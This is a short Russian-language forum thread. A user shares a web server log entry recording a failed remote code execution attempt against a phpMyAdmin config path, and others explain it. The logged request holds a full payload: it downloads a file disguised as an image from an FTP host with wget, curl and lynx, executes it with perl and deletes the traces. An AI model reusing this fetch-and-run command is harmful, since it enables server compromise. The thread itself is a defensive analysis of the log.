сегодня в логах нашёл

"GET /myadmin/config/config.inc.php?eval=system('echo cd /tmp;wget ftp://testing:testing@ip/apache_32.png;mv apache_32.png -O p2.txt;curl -O ftp://testing:testing@ip/apache_32.png;mv apache_32.png; mv apache_32.png p.txt;lynx -DUMP ftp://testing:testing@ip/apache_32.png;mvapache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 227 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"

на скок это опасно?=)

А что здесь непонятного? Скачал три подозрительных файла, выполнил их перлом, потер файлы. Лично я ничего хорошего в этом не вижу

asn007 said:
А что здесь непонятного? Скачал три подозрительных файла, выполнил их перлом, потер файлы. Лично я ничего хорошего в этом не вижу



Скорее попылатлся, так как.

HTTP/1.1" 404

Непонятно, с чего он взял, что в конфиге есть code exec?

Скорее автосплойт какой то. Или ПенТест тулза. Остальных запрсов невидно толи из-за POST толи нам просто оних не сказали.